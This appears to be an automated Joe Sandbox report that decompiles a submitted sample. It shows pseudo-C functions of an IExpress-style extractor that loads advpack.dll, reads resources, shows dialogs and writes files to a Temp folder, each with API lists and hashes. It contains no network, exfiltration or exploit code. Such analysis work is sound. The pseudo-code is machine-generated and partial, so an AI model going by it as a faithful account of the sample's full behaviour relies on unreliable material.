                                                                                                                                                                                                        0x00e864d3
                                                                                                                                                                                                        0x00e864df
                                                                                                                                                                                                        0x00e864e8
                                                                                                                                                                                                        0x00e86502
                                                                                                                                                                                                        0x00e864ee
                                                                                                                                                                                                        0x00e864f9
                                                                                                                                                                                                        0x00e864f9
                                                                                                                                                                                                        0x00e86516

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E864DF
                                                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E864F9
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 00E86502
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                                        • API String ID: 438848745-3680919256
                                                                                                                                                                                                        • Opcode ID: c0761e9a83568dc794e87ebc44c57c2dbbdb239227f8442a3645a114f52b9d21
                                                                                                                                                                                                        • Instruction ID: 614ca556d20a3149e972497a1a6e795c12768d95cde5b3bdf906f272346d1339
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c0761e9a83568dc794e87ebc44c57c2dbbdb239227f8442a3645a114f52b9d21
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01D670A041089FEB10FB65DC49AFE7378DB50310F5015A5F58DB21C0DF709E8A8B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 32%
                                                                                                                                                                                                        			E00E84169(void* __eflags) {
                                                                                                                                                                                                        				int _t18;
                                                                                                                                                                                                        				void* _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = E00E8468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                        				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                        				if(_t21 != 0) {
                                                                                                                                                                                                        					if(E00E8468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							return LocalFree(_t21);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(0x40);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						_push(_t21);
                                                                                                                                                                                                        						_t18 = 0x3e9;
                                                                                                                                                                                                        						L6:
                                                                                                                                                                                                        						E00E844B9(0, _t18);
                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0x10);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					_t18 = 0x4b1;
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        0x00e8417d
                                                                                                                                                                                                        0x00e8418f
                                                                                                                                                                                                        0x00e84193
                                                                                                                                                                                                        0x00e841b7
                                                                                                                                                                                                        0x00e841d3
                                                                                                                                                                                                        0x00e841e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e841e7
                                                                                                                                                                                                        0x00e841d5
                                                                                                                                                                                                        0x00e841d6
                                                                                                                                                                                                        0x00e841d8
                                                                                                                                                                                                        0x00e841d9
                                                                                                                                                                                                        0x00e841da
                                                                                                                                                                                                        0x00e841df
                                                                                                                                                                                                        0x00e841e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e841e1
                                                                                                                                                                                                        0x00e841b9
                                                                                                                                                                                                        0x00e841ba
                                                                                                                                                                                                        0x00e841bc
                                                                                                                                                                                                        0x00e841bd
                                                                                                                                                                                                        0x00e841be
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e841be
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                          • Part of subcall function 00E8468F: SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                          • Part of subcall function 00E8468F: LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                          • Part of subcall function 00E8468F: memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                          • Part of subcall function 00E8468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00E830B4), ref: 00E84189
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00E830B4), ref: 00E841E7
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$FINISHMSG
                                                                                                                                                                                                        • API String ID: 3507850446-3091758298
                                                                                                                                                                                                        • Opcode ID: 3204b47a9a50f35faddb5792e9145349f1c87c945ed4591ea1770c3009702647
                                                                                                                                                                                                        • Instruction ID: d742f27ada3d1d20fc6854aec994c67e60e9f73e15c5e0e97a6e70f4420cfb3e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3204b47a9a50f35faddb5792e9145349f1c87c945ed4591ea1770c3009702647
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A2018BF13412266BF32536664C8AF7B618EDBD4799F05502AB60DF11C09A68DC014365
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00E819E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v520;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t11;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				void* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __edi;
                                                                                                                                                                                                        				_t27 = __ebx;
                                                                                                                                                                                                        				_t11 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                        				_t34 = _a4;
                                                                                                                                                                                                        				_t14 = _a8 - 0x110;
                                                                                                                                                                                                        				if(_t14 == 0) {
                                                                                                                                                                                                        					_t32 = GetDesktopWindow();
                                                                                                                                                                                                        					E00E843D0(_t34, _t15);
                                                                                                                                                                                                        					_v520 = 0;
                                                                                                                                                                                                        					LoadStringA( *0xe89a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                        					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                        					MessageBeep(0xffffffff);
                                                                                                                                                                                                        					goto L6;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if(_t14 != 1) {
                                                                                                                                                                                                        						L4:
                                                                                                                                                                                                        						_t23 = 0;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t32 = _a12;
                                                                                                                                                                                                        						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							EndDialog(_t34, _t32);
                                                                                                                                                                                                        							L6:
                                                                                                                                                                                                        							_t23 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x00e819e0
                                                                                                                                                                                                        0x00e819e0
                                                                                                                                                                                                        0x00e819eb
                                                                                                                                                                                                        0x00e819f2
                                                                                                                                                                                                        0x00e819f9
                                                                                                                                                                                                        0x00e819fc
                                                                                                                                                                                                        0x00e81a01
                                                                                                                                                                                                        0x00e81a2a
                                                                                                                                                                                                        0x00e81a2e
                                                                                                                                                                                                        0x00e81a3e
                                                                                                                                                                                                        0x00e81a4f
                                                                                                                                                                                                        0x00e81a62
                                                                                                                                                                                                        0x00e81a6a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81a03
                                                                                                                                                                                                        0x00e81a06
                                                                                                                                                                                                        0x00e81a20
                                                                                                                                                                                                        0x00e81a20
                                                                                                                                                                                                        0x00e81a08
                                                                                                                                                                                                        0x00e81a08
                                                                                                                                                                                                        0x00e81a14
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e81a16
                                                                                                                                                                                                        0x00e81a18
                                                                                                                                                                                                        0x00e81a70
                                                                                                                                                                                                        0x00e81a72
                                                                                                                                                                                                        0x00e81a72
                                                                                                                                                                                                        0x00e81a14
                                                                                                                                                                                                        0x00e81a06
                                                                                                                                                                                                        0x00e81a81

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E81A18
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E81A24
                                                                                                                                                                                                        • LoadStringA.USER32(?,?,00000200), ref: 00E81A4F
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00E81A62
                                                                                                                                                                                                        • MessageBeep.USER32(000000FF), ref: 00E81A6A
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1273765764-0
                                                                                                                                                                                                        • Opcode ID: b44438b0d52465a415a302fbb4e19c29031f13f5a168e1cffd75c1f85f996e2c
                                                                                                                                                                                                        • Instruction ID: 26e1240067bbcd7b9b1390b00e21b624b70bc9818fd6e11634cc42ec83997bff
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b44438b0d52465a415a302fbb4e19c29031f13f5a168e1cffd75c1f85f996e2c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1611E171601109AFEB04FF64DE4CAAE77B8EF09300F0081A1F91EB2190DB309E05CB92
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                                                                        			E00E863C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				long _v272;
                                                                                                                                                                                                        				void* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				struct _OVERLAPPED* _t37;
                                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                                        				signed int _t40;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t15 ^ _t40;
                                                                                                                                                                                                        				_v272 = _v272 & 0x00000000;
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_v276 = _a16;
                                                                                                                                                                                                        				_t37 = 1;
                                                                                                                                                                                                        				E00E81781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        				E00E8658A( &_v268, 0x104, _a12);
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                                                                                                        				if(_t39 != 0xffffffff) {
                                                                                                                                                                                                        					_t28 = _a4;
                                                                                                                                                                                                        					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                                                                                                                                                                                                        						 *0xe89124 = 0x80070052;
                                                                                                                                                                                                        						_t37 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					CloseHandle(_t39);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					 *0xe89124 = 0x80070052;
                                                                                                                                                                                                        					_t37 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x00e863cb
                                                                                                                                                                                                        0x00e863d2
                                                                                                                                                                                                        0x00e863d8
                                                                                                                                                                                                        0x00e863ea
                                                                                                                                                                                                        0x00e863f3
                                                                                                                                                                                                        0x00e86401
                                                                                                                                                                                                        0x00e86402
                                                                                                                                                                                                        0x00e86410
                                                                                                                                                                                                        0x00e86415
                                                                                                                                                                                                        0x00e86433
                                                                                                                                                                                                        0x00e86438
                                                                                                                                                                                                        0x00e86449
                                                                                                                                                                                                        0x00e86463
                                                                                                                                                                                                        0x00e8646d
                                                                                                                                                                                                        0x00e86477
                                                                                                                                                                                                        0x00e86477
                                                                                                                                                                                                        0x00e8647a
                                                                                                                                                                                                        0x00e8643a
                                                                                                                                                                                                        0x00e8643a
                                                                                                                                                                                                        0x00e86444
                                                                                                                                                                                                        0x00e86444
                                                                                                                                                                                                        0x00e86492

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8642D
                                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8645B
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 00E8647A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E863EB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 1065093856-305352358
                                                                                                                                                                                                        • Opcode ID: 406c74e597355903999992efe962865c171d98f8588e462d6ee009e52eb96c38
                                                                                                                                                                                                        • Instruction ID: 80c60cc2f70cb24fe237ceb4d85363096ae50cfa8b0821f3bf167ddc644b3d74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 406c74e597355903999992efe962865c171d98f8588e462d6ee009e52eb96c38
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6521C371A00218AFD710EF65DCC5FEB73A8EB45314F0041A9A59DB7180DAB05D898F64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E847E0(intOrPtr* __ecx) {
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				intOrPtr _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				intOrPtr* _t22;
                                                                                                                                                                                                        				void _t24;
                                                                                                                                                                                                        				struct HWND__* _t25;
                                                                                                                                                                                                        				struct HWND__* _t26;
                                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                                        				intOrPtr* _t28;
                                                                                                                                                                                                        				intOrPtr* _t33;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                        				if(_t34 != 0) {
                                                                                                                                                                                                        					_t22 = _t33;
                                                                                                                                                                                                        					_t27 = _t22 + 1;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t6 =  *_t22;
                                                                                                                                                                                                        						_t22 = _t22 + 1;
                                                                                                                                                                                                        					} while (_t6 != 0);
                                                                                                                                                                                                        					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                        					 *_t34 = _t24;
                                                                                                                                                                                                        					if(_t24 != 0) {
                                                                                                                                                                                                        						_t28 = _t33;
                                                                                                                                                                                                        						_t19 = _t28 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t9 =  *_t28;
                                                                                                                                                                                                        							_t28 = _t28 + 1;
                                                                                                                                                                                                        						} while (_t9 != 0);
                                                                                                                                                                                                        						E00E81680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                        						_t11 =  *0xe891e0; // 0x688290
                                                                                                                                                                                                        						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                        						 *0xe891e0 = _t34;
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t25 =  *0xe88584; // 0x0
                                                                                                                                                                                                        					E00E844B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					LocalFree(_t34);
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 =  *0xe88584; // 0x0
                                                                                                                                                                                                        				E00E844B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}















                                                                                                                                                                                                        0x00e847e8
                                                                                                                                                                                                        0x00e847f0
                                                                                                                                                                                                        0x00e847f4
                                                                                                                                                                                                        0x00e8480f
                                                                                                                                                                                                        0x00e84811
                                                                                                                                                                                                        0x00e84814
                                                                                                                                                                                                        0x00e84814
                                                                                                                                                                                                        0x00e84816
                                                                                                                                                                                                        0x00e84817
                                                                                                                                                                                                        0x00e84829
                                                                                                                                                                                                        0x00e8482b
                                                                                                                                                                                                        0x00e8482f
                                                                                                                                                                                                        0x00e8484f
                                                                                                                                                                                                        0x00e84852
                                                                                                                                                                                                        0x00e84855
                                                                                                                                                                                                        0x00e84855
                                                                                                                                                                                                        0x00e84857
                                                                                                                                                                                                        0x00e84858
                                                                                                                                                                                                        0x00e84860
                                                                                                                                                                                                        0x00e84865
                                                                                                                                                                                                        0x00e8486a
                                                                                                                                                                                                        0x00e8486f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84876
                                                                                                                                                                                                        0x00e84831
                                                                                                                                                                                                        0x00e84841
                                                                                                                                                                                                        0x00e84847
                                                                                                                                                                                                        0x00e8480b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8480b
                                                                                                                                                                                                        0x00e847f6
                                                                                                                                                                                                        0x00e84806
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00E84E6F), ref: 00E847EA
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E84823
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00E84847
                                                                                                                                                                                                          • Part of subcall function 00E844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E84518
                                                                                                                                                                                                          • Part of subcall function 00E844B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E84554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E84851
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                        • API String ID: 359063898-305352358
                                                                                                                                                                                                        • Opcode ID: 71ddd0e7b0cefe78d4d583ee9afdb72124b887a460528fdf103690621a9cf3a4
                                                                                                                                                                                                        • Instruction ID: c4827cad9a2b3d7bb48b3cfc21d95a96419f4796d01857b161305ac91cf39757
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71ddd0e7b0cefe78d4d583ee9afdb72124b887a460528fdf103690621a9cf3a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47115CF56046429FE718AF749C08F773759E781704B048419FD4EF7381DA358C0A8720
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83680(void* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct tagMSG _v36;
                                                                                                                                                                                                        				int _t8;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                                                        				_t16 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                        					if(_t8 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							if(_v36.message != 0x12) {
                                                                                                                                                                                                        								DispatchMessageA( &_v36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t16 = 1;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                        						} while (_t8 != 0);
                                                                                                                                                                                                        						if(_t16 == 0) {
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t8;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        0x00e8368c
                                                                                                                                                                                                        0x00e8368f
                                                                                                                                                                                                        0x00e83691
                                                                                                                                                                                                        0x00e8369f
                                                                                                                                                                                                        0x00e836a7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e836ba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e836bc
                                                                                                                                                                                                        0x00e836bc
                                                                                                                                                                                                        0x00e836c0
                                                                                                                                                                                                        0x00e836cb
                                                                                                                                                                                                        0x00e836c2
                                                                                                                                                                                                        0x00e836c4
                                                                                                                                                                                                        0x00e836c4
                                                                                                                                                                                                        0x00e836da
                                                                                                                                                                                                        0x00e836e0
                                                                                                                                                                                                        0x00e836e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e836e6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e836ba
                                                                                                                                                                                                        0x00e836ed

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00E8369F
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836B2
                                                                                                                                                                                                        • DispatchMessageA.USER32(?), ref: 00E836CB
                                                                                                                                                                                                        • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00E836DA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
